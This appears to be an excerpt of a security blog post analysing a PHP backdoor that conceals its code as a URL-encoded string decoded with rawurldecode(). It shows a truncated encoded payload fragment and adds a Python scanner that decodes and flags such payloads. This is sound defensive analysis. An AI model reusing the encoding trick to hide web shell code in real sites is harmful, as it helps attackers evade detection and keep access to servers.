Backdoor Obfuscation: tempnam & URL Encoding

In an attempt to avoid detection, attackers and malware authors are always experimenting with different methods to obfuscate their malicious code.

During a recent investigation, we came across an interesting backdoor that was leveraging encoding along with common PHP functions to conceal its operations from any active security systems on the host.

This PHP web shell stores its real code as a URL-encoded string literal, decodes it at runtime with rawurldecode() and assigns the result to the variable $i. Nothing in the file reads like PHP until that call runs: decoded, the string begins "<?php set_time_limit(0);error_reporting(0);if(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key]=stripslashes($value);}}?>" followed by an HTML document, so a simple signature scan over the file on disk sees only percent-escapes. The excerpt below is truncated as it appears in the original post:

<?php
// Encoded payload; the string is cut off here exactly as in the original excerpt.
$i = rawurldecode("%3C%3Fphp%0A%20set_time_limit%280%29%3Berror_reporting%280%29%3Bif%28get_magic_quotes_gpc%28%29%29%7Bforeach%28%24_POST%20as%20%24key%3D%3E%24value%29%7B%24_POST%5B%24key%5D%3Dstripslashes%28%24value%29%3B%7D%7D%3F%3E%0A%3C%21DOCTYPE%20htm
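The practical counter to this trick is to decode before matching: find string literals handed to rawurldecode()/urldecode(), decode them the same way PHP would, and only then look for PHP tags and the usual web shell functions. The following scanner is an added example written for this page, not Sucuri's code or the tooling from the investigation. It uses urllib.parse.unquote (which, like rawurldecode, does not turn "+" into a space) and a hand-picked function list; the sample file contents are constructed for the demo, with the encoded fragment taken from the excerpt above and a closing quote added so the literal parses. The title's tempnam stage (writing the decoded code to a temp file for inclusion) is not covered here, since the page shows only the decode step.

```python
"""Added example: flag PHP files whose rawurldecode()/urldecode() string
argument decodes to PHP code.  Written for this article; not Sucuri's code."""
import re
from urllib.parse import unquote

# Functions worth reporting when they appear in a decoded payload.  The
# first four are the ones visible in the article's decoded prefix; the rest
# are common web shell building blocks (assumption, not from the article).
SUSPICIOUS = (
    "set_time_limit", "error_reporting", "get_magic_quotes_gpc",
    "stripslashes", "tempnam", "eval", "base64_decode",
)

# Matches rawurldecode("...") / urldecode('...') with a plain string literal.
# A URL-encoded payload contains no raw quote characters (they would be
# %22 / %27), so [^'"]* is enough for the argument body.
DECODE_CALL = re.compile(r"""\b(?:raw)?urldecode\s*\(\s*(['"])([^'"]*)\1\s*\)""")


def decode_payload(encoded):
    """Decode as PHP's rawurldecode does: %XX escapes only, '+' untouched."""
    return unquote(encoded)


def scan_php(source):
    """Return one finding per decode call whose argument decodes to PHP code."""
    findings = []
    for match in DECODE_CALL.finditer(source):
        encoded = match.group(2)
        decoded = decode_payload(encoded)
        if "<?php" not in decoded.lower():
            continue  # decodes to ordinary data (query strings, titles, ...)
        findings.append({
            "offset": match.start(),            # where the call sits in the file
            "encoded_length": len(encoded),
            "decoded_prefix": decoded[:48],     # enough to eyeball in a report
            "functions": [f for f in SUSPICIOUS if f in decoded],
        })
    return findings


# Constructed sample: the encoded fragment quoted in the article (still
# truncated there), wrapped in a complete assignment so it parses.
SAMPLE_BACKDOOR = (
    '<?php\n$i = rawurldecode("%3C%3Fphp%0A%20set_time_limit%280%29%3B'
    'error_reporting%280%29%3Bif%28get_magic_quotes_gpc%28%29%29%7Bforeach'
    '%28%24_POST%20as%20%24key%3D%3E%24value%29%7B%24_POST%5B%24key%5D%3D'
    'stripslashes%28%24value%29%3B%7D%7D%3F%3E%0A%3C%21DOCTYPE%20htm");\n'
)

# Constructed benign sample: the same function used on a real query string.
SAMPLE_BENIGN = '<?php\n$q = urldecode("name%3DJane%20Doe%26page%3D2");\n'


if __name__ == "__main__":
    for label, text in (("backdoor", SAMPLE_BACKDOOR), ("benign", SAMPLE_BENIGN)):
        print(label, scan_php(text))
```

Run it over a web root with a loop that reads each .php file into scan_php(); a hit whose "functions" list is non-empty deserves a look, while "decoded_prefix" tells you at a glance whether the decoded string is code or just data. Attackers can stack encodings (base64 inside URL encoding, for example), so treat this as one layer of a decode-then-match pipeline rather than a complete detector.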

Continue reading Backdoor Obfuscation: tempnam & URL Encoding at Sucuri Blog.

Story added 28 September 2020; the full text is available from the source linked above.